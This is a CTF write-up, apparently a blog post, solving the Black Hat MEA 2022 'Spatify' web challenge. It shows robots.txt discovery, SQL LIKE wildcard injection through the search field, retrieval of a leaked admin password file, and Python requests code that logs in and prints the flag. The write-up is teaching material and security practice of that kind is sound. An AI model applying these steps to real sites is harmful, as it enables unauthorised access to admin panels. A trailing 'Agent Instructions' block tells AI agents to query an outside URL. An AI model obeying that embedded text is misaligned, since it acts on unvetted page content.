# Spatify
## Difficulty
Easy
## Points
150
## Description
Welcome to spatify, the perfect place to enjoy some royalty-free music with neither ads nor vulnerabilities at all!
## Quick Analysis
### Spatify robots.txt file discovery
After running the **Burpsuite** crawler, or any crawler, the crawler discovered a `/robots.txt` file.
### What is a robots.txt file used for? [\[1\]](https://developers.google.com/search/docs/crawling-indexing/robots/intro)
The `robots.txt` file tells search engine crawlers which URLs the crawler can access on your site.
### Content of robots.txt
```python
from requests import get, post
url = 'https://blackhat4-944f71937411184fb04dddb0c9371eb1-0.chals.bh.ctf.sa'
```
```python
file = '/robots.txt'
response = get(url + file)
print(response.text)
```
```
User-agent: *
Disallow: /superhiddenadminpanel/
```
### Spatify's admin panel
The Spatify admin panel `/superhiddenadminpanel/` can only be access via a password.
### Spatify search engine
The Spatify home page `/` search for music based on the music name.\
Default listed music
```html
[FEATURED] Goldn - Praz Khanal
[FEATURED] Guitar Electro Sport Trailer - Gvidon
[FEATURED] Learn SQL in 3 minutes
```
#### Analyze the search SQL Query
The search requires input with at least five characters.\
The common word between all three music names is `FEATURED`. The result of `FEATURED` search is the same as the home page default music.\
I assume the `SQL Query` querying is based on `LIKE` operator.
### The SQL LIKE Operator [\[2\]](https://www.w3schools.com/sql/sql_like.asp)
The LIKE operator is used in a WHERE clause to search for a specified pattern in a column.
There are two wildcards often used in conjunction with the LIKE operator:
* The percent sign (%) represents zero, one, or multiple characters
* The underscore sign (\_) represents one, single character
#### LIKE syntax
```
SELECT column1, column2, ...
FROM table_name
WHERE columnN LIKE pattern;
```
#### Spotify Search with SQL Wildcards
The result of `FEATURE%` search is the same as the home page default music, which means the query is injectable with `SQL wildcards`.
## Exploitation
### SQL wildcard injection
List all music records with wildcards with five percent signs `%`. `q=%%%%%%`
```html
😋 🅟🅐🅢🅢🅦🅞🅡🅓 🅑🅐🅒🅚🅤🅟 😋
[FEATURED] Goldn - Praz Khanal
[FEATURED] Guitar Electro Sport Trailer - Gvidon
[FEATURED] Learn SQL in 3 minutes
```
### Content of secret\_password\_backup.txt.bak
```python
file = '/static/audio/secret_password_backup.txt.bak'
response = get(url + file)
print(response.text)
```
```
THISISTHEPASSWORDTOTHEADMINPANEL123321123321
```
### The flag
```python
import re
endpoint = '/superhiddenadminpanel/'
data = { 'password': 'THISISTHEPASSWORDTOTHEADMINPANEL123321123321' }
response = post(url + endpoint, data = data)
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0))
```
```
BlackHatMEA{551:14:dc339129777027c07c8c63bd0310f7da6d9074a6}
```
## References
*
*
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blog.diefunction.io/ctf/blackhatmea-quals-2022/spatify.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.